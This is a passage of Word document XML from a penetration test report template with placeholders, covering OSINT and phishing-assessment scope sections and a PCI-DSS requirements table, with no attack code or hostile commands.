            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1563"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000078" w14:textId="17A0351E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000079" w14:textId="0CC64732">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>{/hosts}{/scope}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="5A74C9BE" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="10D7DE61" w14:textId="1745F8D2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645189" w:id="16"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>3.3 Open Source Intelligence (</w:t>
      </w:r>
      <w:commentRangeStart w:id="17"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>OSINT)</w:t>
      </w:r>
      <w:commentRangeEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="17"/>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000007C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Prior to engagement, {name} gathered publicly accessible information about {company.name}, including but not limited to information found on the {company.name} website and various social media platforms. As a result, {name} was able to </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>leverage</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> valuable information to better assess the {company.name} network infrastructure, gain insights about its users, and </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>utilize</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> knowledge for attacks including social engineering attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000007D" w14:textId="21122272">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645190" w:id="18"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Social </w:t>
      </w:r>
      <w:commentRangeStart w:id="19"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Engineering</w:t>
      </w:r>
      <w:commentRangeEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="19"/>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="0FB6339A" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0523A1EA" w14:textId="6D3D2140">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Prior to the engagement on October 19</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>, 2024, {name} was requested to add a phishing assessment to the security assessment</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">The scope was limited to any user </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> the corporate environment as </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>indicated</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>oui.local</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> email address where a malicious .doc, </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>xls</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">, or .exe could be sent. This phishing test was done to both assess how well-trained employees were at </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>identifying</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> and reporting email phishing while also looking at the malware detection capabilities of {company.name}’s Microsoft Exchange server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="0000007F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000080" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000081" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000082" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000083" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000084" w14:textId="2B68AA4F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645191" w:id="20"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>4 Compliance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000085" w14:textId="2AE39451">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645192" w:id="21"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Standards </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Review</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000086" w14:textId="358AABFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645193" w:id="22"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        </w:rPr>
        <w:t>4.1.1 PCI-DSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000087" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">PCI Security Standards are technical and operational requirements set by the PCI Security Standards Council (PCI SSC) to protect cardholder data. The standards apply to all entities that store, </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>transmit</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> cardholder data – with requirements for software developers and manufacturers of applications and devices used in those transactions. The Council </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>is responsible for</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> managing the security standards, while compliance with the PCI set of standards is enforced by the founding members of the Council: American Express, Discover Financial Services, JCB, MasterCard and Visa Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000088" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000089" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>The PCI Standard consists of the following steps that mirror security best practices:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="0000008A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_1"/>
        <w:id w:val="-1579585577"/>
        <w:lock w:val="contentLocked"/>
        <w:placeholder>
          <w:docPart w:val="DefaultPlaceholder_1081868574"/>
        </w:placeholder>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:tbl>
          <w:tblPr>
            <w:tblW w:w="9522"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Look w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
          </w:tblPr>
          <w:tblGrid>
            <w:gridCol w:w="4767"/>
            <w:gridCol w:w="4755"/>
          </w:tblGrid>
          <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="3396FCA3" w14:textId="77777777">
            <w:trPr>
              <w:trHeight w:val="540"/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4767" w:type="dxa"/>
                <w:shd w:val="clear" w:color="auto" w:fill="2690FF"/>
                <w:tcMar/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="0000008B" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                    <w:color w:val="FFFFFF"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                  </w:rPr>
                  <w:t>Goal</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4755" w:type="dxa"/>
                <w:shd w:val="clear" w:color="auto" w:fill="2690FF"/>
                <w:tcMar/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="0000008C" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                    <w:color w:val="FFFFFF"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                  </w:rPr>
                  <w:t>PCI DSS Requirements</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="4266BE73" w14:textId="77777777">
            <w:trPr>
              <w:trHeight w:val="300"/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4767" w:type="dxa"/>
                <w:tcMar/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="0000008D" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Build and Maintain a</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="0000008E" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Secure Network and</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="0000008F" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Systems</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4755" w:type="dxa"/>
                <w:tcMar/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="00000090" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="1"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Install and maintain a firewall configuration to protect cardholder data</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="00000091" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="1"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Do not use vendor-supplied defaults for system passwords and other security parameters</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="7AA51552" w14:textId="77777777">
            <w:trPr>
              <w:trHeight w:val="300"/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4767" w:type="dxa"/>
                <w:tcMar/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="00000092" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Protect Cardholder Data</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4755" w:type="dxa"/>
                <w:tcMar/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="00000093" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="2"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Protect stored cardholder data</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="00000094" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="2"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Encrypt transmission of cardholder data across open, public networks</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="2A2FD8EF" w14:textId="77777777">
            <w:trPr>
              <w:trHeight w:val="300"/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4767" w:type="dxa"/>
                <w:tcMar/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="00000095" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Maintain a Vulnerability</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="00000096" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Management Program</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4755" w:type="dxa"/>
                <w:tcMar/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="00000097" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="3"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Protect all systems against malware and regularly update anti-virus software or programs</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="00000098" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="3"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Develop and maintain secure systems and applications</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="08A22344" w14:textId="77777777">
            <w:trPr>
              <w:trHeight w:val="300"/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4767" w:type="dxa"/>
                <w:tcMar/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="00000099" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Implement Strong Access</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="0000009A" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Control Measures</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4755" w:type="dxa"/>
                <w:tcMar/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="0000009B" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="5"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Restrict access to cardholder data by business need to know</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="0000009C" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="5"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Identify and authenticate access to system components</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="0000009D" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="5"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:lastRenderedPageBreak/>
                  <w:t>Restrict physical access to cardholder data</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="4F2FA465" w14:textId="77777777">
            <w:trPr>
              <w:trHeight w:val="300"/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4767" w:type="dxa"/>
                <w:tcMar/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="0000009E" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:lastRenderedPageBreak/>
                  <w:t>Regularly Monitor and</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="0000009F" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Test Networks</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4755" w:type="dxa"/>
                <w:tcMar/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="000000A0" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="6"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Track and monitor all access to network resources and cardholder data</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="000000A1" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="6"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Regularly test security systems and processes</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="71C29579" w14:textId="77777777">
            <w:trPr>
              <w:trHeight w:val="300"/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4767" w:type="dxa"/>
                <w:tcMar/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="000000A2" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Maintain an Information</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="000000A3" w14:textId="77777777">
                <w:pPr>
                  <w:jc w:val="center"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Security Policy</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4755" w:type="dxa"/>
                <w:tcMar/>
              </w:tcPr>
              <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="000000A4" w14:textId="77777777">
                <w:pPr>
                  <w:numPr>
                    <w:ilvl w:val="0"/>
                    <w:numId w:val="9"/>
                  </w:numPr>
                  <w:ind w:left="0" w:firstLine="0"/>
                </w:pPr>
                <w:r w:rsidRPr="0FB6339A">
                  <w:t>Maintain a policy that addresses information security for all personnel</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000000A5" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000A6" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">PCI DSS information sourced from: </w:t>
      </w:r>
      <w:hyperlink r:id="Rcd5797ceabc340a5">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://listings.pcisecuritystandards.org/documents/PCI_DSS-QRG-v3_2_1.pdf</w:t>
